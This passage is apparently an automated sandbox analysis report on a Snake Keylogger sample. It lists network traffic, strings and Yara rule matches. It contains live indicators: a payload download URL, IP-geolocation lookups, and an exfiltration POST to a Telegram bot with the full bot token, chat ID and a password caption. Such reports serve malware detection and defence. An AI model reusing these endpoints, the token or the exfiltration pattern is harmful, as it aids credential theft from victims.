                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49755 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /Yinmwpj.pdf HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Yinmwpj.pdf HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: nexoproducciones.cl
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendDocument?chat_id=6243598265&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9054f877039Host: api.telegram.orgContent-Length: 566Connection: Keep-Alive
                Source: InstallUtil.exe, 00000001.00000002.4150876359.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: InstallUtil.exe, 00000001.00000002.4150876359.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003125000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003116000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000302E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002620000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002538000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: InstallUtil.exe, 00000001.00000002.4150876359.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003125000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000306C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003116000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000302E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030F7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002620000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002525000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002538000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: InstallUtil.exe, 00000001.00000002.4150876359.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Ndnownts.exe, 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: InstallUtil.exe, 00000001.00000002.4150876359.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003046000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003125000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003116000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002550000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002620000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: Ndnownts.exe, 00000000.00000002.1741258818.0000000002581000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: InstallUtil.exe, 00000001.00000002.4150876359.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: InstallUtil.exe, 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: InstallUtil.exe, 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendDocument?chat_id=6243
                Source: Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: Ndnownts.exe, 00000000.00000002.1741258818.0000000002581000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nexoproducciones.cl
                Source: Ndnownts.exe, 00000000.00000002.1741258818.0000000002581000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nexoproducciones.cl/Yinmwpj.pdf
                Source: Ndnownts.exe, IsInvalid.exe.0.drString found in binary or memory: https://nexoproducciones.cl/Yinmwpj.pdfKThis
                Source: InstallUtil.exe, 00000001.00000002.4150876359.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003125000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000306C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003116000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000302E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002620000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002538000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Ndnownts.exe, 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000302E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: InstallUtil.exe, 00000007.00000002.4151007876.00000000025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72
                Source: InstallUtil.exe, 00000001.00000002.4150876359.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003125000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000306C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003116000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002620000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72$
                Source: Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1741258818.0000000002626000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000003016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownHTTPS traffic detected: 190.107.177.80:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 190.107.177.80:443 -> 192.168.2.4:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49769 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.Ndnownts.exe.3589550.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Ndnownts.exe.3589550.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Ndnownts.exe.3589550.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Ndnownts.exe.3589550.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: Ndnownts.exe PID: 4544, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Ndnownts.exe PID: 4544, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: IsInvalid.exe PID: 3688, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: IsInvalid.exe PID: 3688, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_00B692F00_2_00B692F0
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_00B6D3880_2_00B6D388
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_00B692E00_2_00B692E0
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_00B699820_2_00B69982
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_055687F90_2_055687F9
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_0556893E0_2_0556893E
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_055689C50_2_055689C5
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_055688080_2_05568808
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_055628D90_2_055628D9
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_055628E80_2_055628E8
